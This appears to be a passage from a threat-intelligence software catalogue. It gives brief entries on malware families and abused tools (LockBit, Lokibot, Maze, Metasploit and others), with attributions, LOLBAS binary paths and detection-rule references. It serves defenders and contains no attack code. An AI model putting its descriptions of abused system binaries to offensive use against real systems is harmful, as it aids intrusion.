[LightNeuron](https://app.tidalcyber.com/software/c9d2f023-d54b-4d08-9598-a42fb92b3161) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://app.tidalcyber.com/software/c9d2f023-d54b-4d08-9598-a42fb92b3161) has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://app.tidalcyber.com/software/c9d2f023-d54b-4d08-9598-a42fb92b3161) exists.<sup>[[ESET LightNeuron May 2019](https://app.tidalcyber.com/references/679aa333-572c-44ba-b94a-606f168d1ed2)]</sup>

The tag is: misp-galaxy:software="LightNeuron"

Ligolo

Ligolo is a tool used to establish SOCKS5 or TCP tunnels from a reverse connection.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Ligolo"

Linfo

The tag is: misp-galaxy:software="Linfo"

Linux Rabbit

[Linux Rabbit](https://app.tidalcyber.com/software/d017e133-fce9-4982-a2df-6867a80089e7) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.<sup>[[Anomali Linux Rabbit 2018](https://app.tidalcyber.com/references/e843eb47-21b0-44b9-8065-02aea0a0b05f)]</sup>

The tag is: misp-galaxy:software="Linux Rabbit"

LitePower

[LitePower](https://app.tidalcyber.com/software/cc568409-71ff-468b-9c38-d0dd9020e409) is a downloader and second stage malware that has been used by [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) since at least 2021.<sup>[[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]</sup>

The tag is: misp-galaxy:software="LitePower"

Tirion - Associated Software

The tag is: misp-galaxy:software="Tirion - Associated Software"

Lizar

[Lizar](https://app.tidalcyber.com/software/65d46aab-b3ce-4f5b-b1fc-871db2573fa1) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d). It has likely been used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) since at least February 2021.<sup>[[BiZone Lizar May 2021](https://app.tidalcyber.com/references/315f47e1-69e5-4dcb-94b2-59583e91dd26)]</sup><sup>[[Threatpost Lizar May 2021](https://app.tidalcyber.com/references/1b89f62f-586d-4dee-b6dd-e5a5cd090a0e)]</sup><sup>[[Gemini FIN7 Oct 2021](https://app.tidalcyber.com/references/bbaef178-8577-4398-8e28-604faf0950b4)]</sup>

The tag is: misp-galaxy:software="Lizar"

LockBit Black - Associated Software

<sup>[[U.S. CISA LockBit 3.0 March 2023](/references/06de9247-ce40-4709-a17a-a65b8853758b)]</sup>

The tag is: misp-galaxy:software="LockBit Black - Associated Software"

LockBit 3.0

Ransomware labeled “LockBit” was first observed in 2020, and since that time, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (“CISA”), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (September 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup> According to CISA, LockBit 3.0 (also known as “LockBit Black”) shares code similarities with Blackmatter and BlackCat ransomware and is “more modular and evasive” than previous LockBit strains.<sup>[[U.S. CISA LockBit 3.0 March 2023](/references/06de9247-ce40-4709-a17a-a65b8853758b)]</sup>

According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims (all associated with LockBit 3.0), more than double the number of the next threat (Clop, with 179 victims).<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup>

Delivered By: Cobalt Strike<sup>[[Sentinel Labs LockBit 3.0 July 2022](/references/9a73b140-b483-4274-a134-ed1bb15ac31c)]</sup>, PsExec<sup>[[NCC Group Research Blog August 19 2022](/references/8c1fbe98-5fc1-4e67-9b96-b740ffc9b1ae)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/lockbit/

The tag is: misp-galaxy:software="LockBit 3.0"

LockerGoga

[LockerGoga](https://app.tidalcyber.com/software/65bc8e81-0a08-49f6-9d04-a2d63d512342) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.<sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup><sup>[[CarbonBlack LockerGoga 2019](https://app.tidalcyber.com/references/9970063c-6df7-4638-a247-6b1102289372)]</sup>

The tag is: misp-galaxy:software="LockerGoga"

Rescue - Associated Software

The tag is: misp-galaxy:software="Rescue - Associated Software"

LogMeIn

LogMeIn provides multiple freely available tools that can be used for remote access to systems, including the flagship Rescue tool.<sup>[[LogMeIn Homepage](/references/e113b544-82ad-4099-ab4e-7fc8b78f54bd)]</sup> Adversary groups, including the Royal ransomware operation and LAPSUS$, have used LogMeIn remote access software for initial access to and persistence within victim networks.<sup>[[CISA Royal AA23-061A March 2023](/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]</sup><sup>[[CSRB LAPSUS$ July 24 2023](/references/f8311977-303c-4d05-a7f4-25b3ae36318b)]</sup>

The tag is: misp-galaxy:software="LogMeIn"

LoJax

The tag is: misp-galaxy:software="LoJax"

Lokibot

[Lokibot](https://app.tidalcyber.com/software/4fead65c-499d-4f44-8879-2c35b24dac68) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. [Lokibot](https://app.tidalcyber.com/software/4fead65c-499d-4f44-8879-2c35b24dac68) can also create a backdoor into infected systems to allow an attacker to install additional payloads.<sup>[[Infoblox Lokibot January 2019](https://app.tidalcyber.com/references/17ab0f84-a062-4c4f-acf9-e0b8f81c3cda)]</sup><sup>[[Morphisec Lokibot April 2020](https://app.tidalcyber.com/references/e938bab1-7dc1-4a78-b1e2-ab2aa0a83eb0)]</sup><sup>[[CISA Lokibot September 2020](https://app.tidalcyber.com/references/df979f7b-6de8-4029-ae47-700f29157db0)]</sup>

The tag is: misp-galaxy:software="Lokibot"

LookBack

[LookBack](https://app.tidalcyber.com/software/bfd2a077-5000-4500-82c4-5c85fb98dd5a) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://app.tidalcyber.com/software/bfd2a077-5000-4500-82c4-5c85fb98dd5a).<sup>[[Proofpoint LookBack Malware Aug 2019](https://app.tidalcyber.com/references/77887f82-7815-4a91-8c8a-f77dc8a9ba53)]</sup><sup>[[Dragos TALONITE](https://app.tidalcyber.com/references/f8ef1920-a4ad-4d65-b9de-8357d75f6929)]</sup><sup>[[Dragos Threat Report 2020](https://app.tidalcyber.com/references/8bb3147c-3178-4449-9978-f1248b1bcb0a)]</sup>

The tag is: misp-galaxy:software="LookBack"

LostMyPassword

LostMyPassword is a tool used to recover passwords from Windows systems.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="LostMyPassword"

LoudMiner

[LoudMiner](https://app.tidalcyber.com/software/f503535b-406c-4e24-8123-0e22fec995bb) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.<sup>[[ESET LoudMiner June 2019](https://app.tidalcyber.com/references/f1e4ff9e-cb6c-46cc-898e-5f170bb5f634)]</sup>

The tag is: misp-galaxy:software="LoudMiner"

LOWBALL

[LOWBALL](https://app.tidalcyber.com/software/fce1117a-e699-4aef-b1fc-04c3967acc33) is malware used by [admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. <sup>[[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]</sup>

The tag is: misp-galaxy:software="LOWBALL"

Lslsass

[Lslsass](https://app.tidalcyber.com/software/37a5ae23-3da5-4cbc-a21a-a7ef98a3b7cc) is a publicly-available tool that can dump active logon session password hashes from the lsass process. <sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:software="Lslsass"

Lucifer

[Lucifer](https://app.tidalcyber.com/software/723d9a27-74fd-4333-a8db-63df2a8b4dd4) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.<sup>[[Unit 42 Lucifer June 2020](https://app.tidalcyber.com/references/3977a87a-2eab-4a67-82b2-10c9dc7e4554)]</sup>

The tag is: misp-galaxy:software="Lucifer"

Enfal - Associated Software

The tag is: misp-galaxy:software="Enfal - Associated Software"

Lurid

[Lurid](https://app.tidalcyber.com/software/0cc9e24b-d458-4782-a332-4e4fd68c057b) is a malware family that has been used by several groups, including [PittyTiger](https://app.tidalcyber.com/groups/60936d3c-37ed-4116-a407-868da3aa4446), in targeted attacks as far back as 2006. <sup>[[Villeneuve 2014](https://app.tidalcyber.com/references/a156e24e-0da5-4ac7-b914-29f2f05e7d6f)]</sup> <sup>[[Villeneuve 2011](https://app.tidalcyber.com/references/ed5a2ec0-8328-40db-9f58-7eaac4ad39a0)]</sup>

The tag is: misp-galaxy:software="Lurid"

Pyark - Associated Software

The tag is: misp-galaxy:software="Pyark - Associated Software"

Machete

[Machete](https://app.tidalcyber.com/software/be8a1630-9562-41ad-a621-65989f961a10) is a cyber espionage toolset used by [Machete](https://app.tidalcyber.com/groups/a3be79a2-3d4f-4697-a8a1-83f0884220af). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.<sup>[[ESET Machete July 2019](https://app.tidalcyber.com/references/408d5e33-fcb6-4d21-8be9-7aa5a8bd3385)]</sup><sup>[[Securelist Machete Aug 2014](https://app.tidalcyber.com/references/fc7be240-bd15-4ec4-bc01-f8891d7210d9)]</sup><sup>[[360 Machete Sep 2020](https://app.tidalcyber.com/references/682c843d-1bb8-4f30-9d2e-35e8d41b1976)]</sup>

The tag is: misp-galaxy:software="Machete"

DazzleSpy - Associated Software

The tag is: misp-galaxy:software="DazzleSpy - Associated Software"

OSX.CDDS - Associated Software

The tag is: misp-galaxy:software="OSX.CDDS - Associated Software"

MacMa

[MacMa](https://app.tidalcyber.com/software/7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://app.tidalcyber.com/software/7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb) has been observed in the wild since November 2021.<sup>[[ESET DazzleSpy Jan 2022](https://app.tidalcyber.com/references/212012ac-9084-490f-8dd2-5cc9ac6e6de1)]</sup>

The tag is: misp-galaxy:software="MacMa"

macOS.OSAMiner

[macOS.OSAMiner](https://app.tidalcyber.com/software/74feb557-21bc-40fb-8ab5-45d3af84c380) is a Monero mining trojan that was first observed in 2018; security researchers assessed [macOS.OSAMiner](https://app.tidalcyber.com/software/74feb557-21bc-40fb-8ab5-45d3af84c380) may have been circulating since at least 2015. [macOS.OSAMiner](https://app.tidalcyber.com/software/74feb557-21bc-40fb-8ab5-45d3af84c380) is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.<sup>[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)]</sup><sup>[[VMRay OSAMiner dynamic analysis 2021](https://app.tidalcyber.com/references/47a5d32d-e6a5-46c2-898a-e45dc42371be)]</sup>

The tag is: misp-galaxy:software="macOS.OSAMiner"

MacSpy

[MacSpy](https://app.tidalcyber.com/software/e5e67c67-e658-45b5-850b-044312be4258) is a malware-as-a-service offered on the darkweb <sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup>.

The tag is: misp-galaxy:software="MacSpy"

Mafalda

[Mafalda](https://app.tidalcyber.com/software/7506616c-b808-54fb-9982-072a0dcf8a04) is a flexible interactive implant that has been used by [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b). Security researchers assess the [Mafalda](https://app.tidalcyber.com/software/7506616c-b808-54fb-9982-072a0dcf8a04) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. <sup>[[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)]</sup>

The tag is: misp-galaxy:software="Mafalda"

MailSniper

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.<sup>[[GitHub MailSniper](https://app.tidalcyber.com/references/50595548-b0c6-49d1-adab-43c8969ae716)]</sup>

The tag is: misp-galaxy:software="MailSniper"

Makecab.exe - Associated Software

<sup>[[Makecab.exe - LOLBAS Project](/references/6473e36b-b5ad-4254-b46d-38c53ccbe446)]</sup>

The tag is: misp-galaxy:software="Makecab.exe - Associated Software"

Makecab

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary to package existing files into a cabinet (.cab) file

Author: Oddvar Moe

Paths:
* C:\Windows\System32\makecab.exe
* C:\Windows\SysWOW64\makecab.exe

Detection:
* Sigma: [proc_creation_win_susp_alternate_data_streams.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml)
* Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml)
* IOC: Makecab retrieving files from Internet
* IOC: Makecab storing data into alternate data streams<sup>[[Makecab.exe - LOLBAS Project](/references/6473e36b-b5ad-4254-b46d-38c53ccbe446)]</sup>

The tag is: misp-galaxy:software="Makecab"

Manage-bde.wsf - Associated Software

<sup>[[Manage-bde.wsf - LOLBAS Project](/references/74d5483e-2268-464c-a048-bb1f25bbfc4f)]</sup>

The tag is: misp-galaxy:software="Manage-bde.wsf - Associated Software"

Manage-bde

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Script for managing BitLocker

Author: Oddvar Moe

Paths:
* C:\Windows\System32\manage-bde.wsf

Detection:
* Sigma: [proc_creation_win_lolbin_manage_bde.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml)
* IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations<sup>[[Manage-bde.wsf - LOLBAS Project](/references/74d5483e-2268-464c-a048-bb1f25bbfc4f)]</sup>

The tag is: misp-galaxy:software="Manage-bde"

MarkiRAT

[MarkiRAT](https://app.tidalcyber.com/software/40806539-1496-4a64-b740-66f6a1467f40) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://app.tidalcyber.com/groups/275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb) since at least 2015.<sup>[[Kaspersky Ferocious Kitten Jun 2021](https://app.tidalcyber.com/references/b8f8020d-3f5c-4b5e-8761-6ecdd63fcd50)]</sup>

The tag is: misp-galaxy:software="MarkiRAT"

Matryoshka

[Matryoshka](https://app.tidalcyber.com/software/eeb700ea-2819-46f4-936d-f7592f20dedc) is a malware framework used by [CopyKittens](https://app.tidalcyber.com/groups/6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. <sup>[[ClearSky Wilted Tulip July 2017](https://app.tidalcyber.com/references/50233005-8dc4-4e91-9477-df574271df40)]</sup> <sup>[[CopyKittens Nov 2015](https://app.tidalcyber.com/references/04e3ce40-5487-4931-98db-f55da83f412e)]</sup>

The tag is: misp-galaxy:software="Matryoshka"

Mavinject.exe - Associated Software

<sup>[[LOLBAS Mavinject](/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]</sup>

The tag is: misp-galaxy:software="Mavinject.exe - Associated Software"

Mavinject

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by App-v in Windows

Author: Oddvar Moe

Paths:
* C:\Windows\System32\mavinject.exe
* C:\Windows\SysWOW64\mavinject.exe

Detection:
* Sigma: [proc_creation_win_lolbin_mavinject_process_injection.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml)
* IOC: mavinject.exe should not run unless APP-v is in use on the workstation<sup>[[LOLBAS Mavinject](/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]</sup>

The tag is: misp-galaxy:software="Mavinject"

Maze

[Maze](https://app.tidalcyber.com/software/3c206491-45c0-4ff7-9f40-45f9aae4de64) ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://app.tidalcyber.com/software/3c206491-45c0-4ff7-9f40-45f9aae4de64) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.<sup>[[FireEye Maze May 2020](https://app.tidalcyber.com/references/02338a66-6820-4505-8239-a1f1fcc60d32)]</sup><sup>[[McAfee Maze March 2020](https://app.tidalcyber.com/references/627a14dd-5300-4f58-869c-0ec91ffb664e)]</sup><sup>[[Sophos Maze VM September 2020](https://app.tidalcyber.com/references/9c4bbcbb-2c18-453c-8b02-0a0cd512c3f3)]</sup>

The tag is: misp-galaxy:software="Maze"

MCMD

The tag is: misp-galaxy:software="MCMD"

MechaFlounder

[MechaFlounder](https://app.tidalcyber.com/software/31cbe3c8-be88-4a4f-891d-04c3bb7ed482) is a python-based remote access tool (RAT) that has been used by [APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1). The payload uses a combination of actor developed code and code snippets freely available online in development communities.<sup>[[Unit 42 MechaFlounder March 2019](https://app.tidalcyber.com/references/2263af27-9c30-4bf6-a204-2f148ebdd17c)]</sup>

The tag is: misp-galaxy:software="MechaFlounder"

MedusaLocker Ransomware

MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.<sup>[[HC3 Analyst Note MedusaLocker Ransomware February 2023](/references/49e314d6-5324-41e0-8bee-2b3e08d5e12f)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/medusalocker/

The tag is: misp-galaxy:software="MedusaLocker Ransomware"

meek

[meek](https://app.tidalcyber.com/software/6c3bbcae-3217-43c7-b709-5c54bc7636b1) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.

The tag is: misp-galaxy:software="meek"

MegaCortex

[MegaCortex](https://app.tidalcyber.com/software/d8a4a817-2914-47b0-867c-ad8eeb7efd10) is ransomware that first appeared in May 2019. <sup>[[IBM MegaCortex](https://app.tidalcyber.com/references/3d70d9b7-88e4-411e-a59a-bc862da965a7)]</sup> [MegaCortex](https://app.tidalcyber.com/software/d8a4a817-2914-47b0-867c-ad8eeb7efd10) has mainly targeted industrial organizations. <sup>[[FireEye Ransomware Disrupt Industrial Production](https://app.tidalcyber.com/references/9ffa0f35-98e4-4265-8b66-9c805a2b6525)]</sup><sup>[[FireEye Financial Actors Moving into OT](https://app.tidalcyber.com/references/4bd514b8-1f79-4946-b001-110ce5cf29a9)]</sup>

The tag is: misp-galaxy:software="MegaCortex"

MEGAsync

A legitimate binary that automates syncing between an endpoint and the MEGA Cloud Drive.<sup>[[GitHub meganz MEGAsync](/references/6e59c47d-597c-4687-942f-9f1cf1db75d5)]</sup> Adversaries are known to abuse the tool for data exfiltration purposes.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="MEGAsync"

Melcoz

[Melcoz](https://app.tidalcyber.com/software/aa844e6b-feda-4928-8c6d-c59f7be88da0) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://app.tidalcyber.com/software/aa844e6b-feda-4928-8c6d-c59f7be88da0) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.<sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup>

The tag is: misp-galaxy:software="Melcoz"

MESSAGETAP

[MESSAGETAP](https://app.tidalcyber.com/software/15d7e478-349d-42e6-802d-f16302b98319) is a data mining malware family deployed by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. <sup>[[FireEye MESSAGETAP October 2019](https://app.tidalcyber.com/references/f56380e8-3cfa-407c-a493-7f9e50ba3867)]</sup>

The tag is: misp-galaxy:software="MESSAGETAP"

metaMain

[metaMain](https://app.tidalcyber.com/software/0a9874bf-4f02-5fab-8ab6-d0f42c6bc71d) is a backdoor used by [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) to maintain long-term access to compromised machines; it has also been used to decrypt [Mafalda](https://app.tidalcyber.com/software/7506616c-b808-54fb-9982-072a0dcf8a04) into memory.<sup>[[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)]</sup><sup>[[SentinelLabs Metador Technical Appendix Sept 2022](https://app.tidalcyber.com/references/aa021076-e9c5-5428-a938-c10cfb6b7c97)]</sup>

The tag is: misp-galaxy:software="metaMain"

Casbaneiro - Associated Software

The tag is: misp-galaxy:software="Casbaneiro - Associated Software"

Metamorfo

[Metamorfo](https://app.tidalcyber.com/software/ca607087-25ad-4a91-af83-608646cccbcb) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.<sup>[[Medium Metamorfo Apr 2020](https://app.tidalcyber.com/references/356defac-b976-41c1-aac8-5d6ff0c80e28)]</sup><sup>[[ESET Casbaneiro Oct 2019](https://app.tidalcyber.com/references/a5cb3ee6-9a0b-4e90-bf32-be7177a858b1)]</sup>

The tag is: misp-galaxy:software="Metamorfo"

Metasploit

The Metasploit Framework is an open-source software project that aids in penetration testing.<sup>[[Metasploit_Ref](/references/ab6ea6b3-3c71-4e69-9713-dae3e4446083)]</sup> The software is often abused by malicious actors to perform a range of post-exploitation activities.

The tag is: misp-galaxy:software="Metasploit"

Meteor

[Meteor](https://app.tidalcyber.com/software/ee07030e-ff50-404b-ad27-ab999fc1a23a) is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. [Meteor](https://app.tidalcyber.com/software/ee07030e-ff50-404b-ad27-ab999fc1a23a) is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.<sup>[[Check Point Meteor Aug 2021](https://app.tidalcyber.com/references/bb79207f-3ab4-4b86-8b1c-d587724efb7c)]</sup>

The tag is: misp-galaxy:software="Meteor"

Mftrace.exe - Associated Software

<sup>[[Mftrace.exe - LOLBAS Project](/references/b6d42cc9-1bf0-4389-8654-90b8d4e7ff49)]</sup>

The tag is: misp-galaxy:software="Mftrace.exe - Associated Software"

Mftrace

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Trace log generation tool for Media Foundation Tools.

Author: Oddvar Moe

Paths:
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
* C:\Program Files (x86)\Windows Kits\10\bin\x86
* C:\Program Files (x86)\Windows Kits\10\bin\x64

Detection:
* Sigma: proc_creation_win_lolbin_mftrace.yml<sup>[[Mftrace.exe - LOLBAS Project](/references/b6d42cc9-1bf0-4389-8654-90b8d4e7ff49)]</sup>

The tag is: misp-galaxy:software="Mftrace"

Micropsia

The tag is: misp-galaxy:software="Micropsia"

Microsoft.NodejsTools.PressAnyKey.exe - Associated Software

<sup>[[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project](/references/25c46948-a648-4c3c-b442-e700df68fa20)]</sup>

The tag is: misp-galaxy:software="Microsoft.NodejsTools.PressAnyKey.exe - Associated Software"

Microsoft.NodejsTools.PressAnyKey

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Part of the NodeJS Visual Studio tools.

Author: mr.d0x

Paths:
* C:\Program Files\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
* C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe

Detection:
* Sigma: [proc_creation_win_renamed_pressanykey.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml)
* Sigma: proc_creation_win_pressanykey_lolbin_execution.yml<sup>[[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project](/references/25c46948-a648-4c3c-b442-e700df68fa20)]</sup>

The tag is: misp-galaxy:software="Microsoft.NodejsTools.PressAnyKey"

Microsoft.Workflow.Compiler.exe - Associated Software

<sup>[[Microsoft.Workflow.Compiler.exe - LOLBAS Project](/references/1e659b32-a06f-45dc-a1eb-03f1a42c55ef)]</sup>

The tag is: misp-galaxy:software="Microsoft.Workflow.Compiler.exe - Associated Software"

Microsoft.Workflow.Compiler

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.

Author: Conor Richard

Paths:
* C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe

Detection:
* Sigma: [proc_creation_win_lolbin_workflow_compiler.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml)
* Splunk: [suspicious_microsoft_workflow_compiler_usage.yml](https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml)
* Splunk: [suspicious_microsoft_workflow_compiler_rename.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml)
* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)
* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)
